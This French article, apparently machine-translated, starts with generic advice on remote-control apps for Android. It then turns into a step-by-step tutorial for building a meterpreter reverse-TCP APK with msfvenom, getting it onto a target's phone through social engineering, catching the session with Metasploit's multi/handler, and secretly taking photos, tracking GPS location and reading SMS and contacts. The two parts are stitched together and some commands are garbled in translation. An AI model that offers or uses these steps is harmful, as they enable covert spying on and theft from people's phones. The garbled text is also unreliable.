Si nous voulons contrôler le téléphone Android à distance, comment pouvons-nous y parvenir? Maintenant, nous devons essentiellement utiliser un logiciel pour terminer. Parce que ce sera plus facile de le faire avec un logiciel. Beaucoup de gens ne savent peut-être pas quelles sont les étapes de fonctionnement spécifiques. Ensuite, voyons comment terminer le contrôle à distance des téléphones Android. Alors, comment réaliser un téléphone mobile avec télécommande Android ?
Tout d'abord, nous devons installer l'APP sur le téléphone mobile et utiliser le téléphone mobile pour contrôler le téléphone mobile.Ensuite, les deux téléphones mobiles doivent être installés.Pour l'ordinateur, un terminal de contrôle qui correspond à la version du système d'exploitation de l'ordinateur doit être installé sur l'ordinateur. La façon de télécharger l'APP sur le téléphone mobile est très simple et directe. Pour les ordinateurs, vous devez vous rendre sur le site officiel pour télécharger. La méthode d'installation peut être installée en fonction des invites. Comme les logiciels ordinaires, la méthode de téléchargement et la méthode d'installation sont en fait très simples.
Après avoir installé le logiciel, nous devons également créer un compte. L'enregistrement d'un compte est très important pour utiliser le logiciel, car si vous n'avez pas de compte, vous ne pouvez pas vous connecter et vous ne pouvez pas activer la fonction de contrôle à distance. Parce que nous devons utiliser le compte pour lier les informations de l'hôte, lorsque nous allons sur le site officiel pour nous inscrire, nous n'avons qu'à remplir le nom du compte, définir un mot de passe de compte, puis lier notre numéro de téléphone mobile, et enfin choisir un utilisateur individuel ou utilisateur d'entreprise, vous pouvez enregistrer un compte qui vous appartient.
Comme nous utilisons un téléphone Android, nous devons encore effectuer certains réglages pour pouvoir utiliser la fonction de contrôle à distance au lieu d'utiliser directement le logiciel. Dans des circonstances normales, nous choisirons d'obtenir des privilèges root, mais l'obtention de ce privilège aura un impact sur notre utilisation des téléphones mobiles. Ensuite, lors de l'utilisation de l'application, il vous suffit d'activer le service auxiliaire sur le téléphone mobile, afin que vous puissiez utiliser le logiciel pour le contrôle à distance, ce sera donc plus pratique que d'autres logiciels.
Si vous ne savez pas comment contrôler votre téléphone Android, il est très simple d'utiliser le logiciel et vous n'avez qu'à suivre quelques étapes simples pour le compléter. Et il est également très stable lors de l'utilisation, il suffit d'activer le service auxiliaire pour pouvoir effectuer un contrôle à distance n'importe où.
Dans la plupart des cas, après l'installation du programme malveillant sur le téléphone Android, il sera plus ou moins contrôlé à distance, de sorte que l'attaquant obtient la photo silencieuse à distance, la vidéo, l'enregistrement, l'emplacement et l'accès au carnet d'adresses et SMS de la cible Téléphone Android via des instructions en arrière-plan Il n'y a vraiment rien à craindre, discutons de cette technologie ci-dessous.
Metasploit dans Kali dispose d'un outil appelé msfvenom qui peut générer de nombreuses versions de charges utiles, c'est-à-dire des télécommandes exécutables. Par exemple, nous pouvons installer le programme exécutable Android apk généré sur le téléphone mobile cible via le travail social, puis effectuer une surveillance ou un suivi à long terme. Comment y parvenir? Ici nous utiliserons msfvenom, puis nous verrons la méthode utilisée.
Une fois le téléphone Android contrôlé à distance par kali : réalisez la prise de photos, le positionnement et l'enregistrement à distance
Générer une télécommande Android
Entrez dans le terminal kali :
msfvenom -h afficher l'aide à l'utilisation
Les paramètres auxquels nous devons prêter attention sont -p (spécifier la charge utile de l'attaque) -f (spécifier le format du fichier généré)
msfvenom -l charges utiles
msfvenom -l formats
La commande complète pour générer la télécommande :
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.31.111 LPORT=8888 R test.apk
Le paramètre -f n'est pas utilisé ici pour générer un programme exécutable Android, qui peut être omis.
Déployer l'exécutable
Installez l'application de contrôle à distance Android générée sur la machine cible et laissez la cible télécharger et installer l'apk en créant un serveur.
Une fois le téléphone Android contrôlé à distance par kali : réalisez la prise de photos, le positionnement et l'enregistrement à distance
Écouter avec metasploit
démarrer msf
Entrez dans le terminal Kali : msfconsole
Allez-y et tapez :
utiliser exploit/multi/gestionnaire
Ce module est dédié à la mise en place de gestionnaires de connexion autonomes, la dernière pièce du puzzle que nous recherchions! Dans le cas de l'utilisation de charges utiles de contrôle à distance, il est nécessaire de définir multi/handler, sinon le processus ne peut pas être contrôlé à distance.
Définissez les paramètres de ce module :
afficher les options
définir LHOST 192.168.31.111
définir lport 8888
Les paramètres ici doivent être cohérents avec les paramètres précédents utilisant msfvenom.
Exécutez l'écoute, en attendant d'aller en ligne
obtenir une session meterpreter
Une fois que l'utilisateur du téléphone Android cible (cible) clique sur l'icône test.apk que nous avons générée, notre kali écoutera le signal de connexion et obtiendra une session meterpreter pour contrôler à distance le téléphone cible (cible). " pour afficher toutes les commandes permettant de contrôler à distance les téléphones Android, nous choisissons ici les trois plus excitantes :
Prendre des photos à distance :
Le téléphone mobile cible ne remarquera rien, il appartient au système d'arrière-plan de prendre des photos ;
positionnement GPS :
Affichage direct de l'emplacement géographique de la longitude et de la latitude, très précis ;
Afficher les messages texte et les contacts ;